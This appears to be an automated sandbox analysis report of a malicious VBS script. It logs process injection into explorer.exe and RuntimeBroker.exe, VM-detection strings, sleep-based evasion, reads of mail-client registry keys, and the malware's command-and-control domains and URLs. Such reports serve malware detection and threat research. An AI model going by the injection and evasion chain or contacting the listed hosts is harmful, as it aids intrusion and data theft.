Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3488			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1819			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 6024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWpn
Source: RuntimeBroker.exe, 0000001F.00000000.810750161.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000020.00000002.912551846.000001B4F862A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: mshta.exe, 00000011.00000003.746769025.00000164FEABF000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
Source: explorer.exe, 0000001E.00000000.836872400.000000000FD75000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000000.817397904.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 0000001F.00000000.812442013.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 3100000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 27FF7160000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000 protect: page execute and read and write

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EA000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 24C0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 9E8000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 3100000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: unknown
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 4660
Source: C:\Windows\explorer.exe	Thread register set: target process: 6188

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EA000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 24C0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 9E8000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 3100000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 27FF7160000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 738687B000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2177000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9B6E3C8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580

Source: explorer.exe, 0000001E.00000002.911824864.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Name	IP	Active
myip.opendns.com	84.17.52.25	true
c56.lepini.at	47.241.19.44	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	47.241.19.44	true
api10.laptok.at	47.241.19.44	true
222.222.67.208.in-addr.arpa	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b	false	Avira URL Cloud: safe	unknown

ID:	321602
Product:	CloudBasic
Start time:	12:17:52
Start date:	23.11.2020
Sample:	2Q4tLHa5wbO1.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2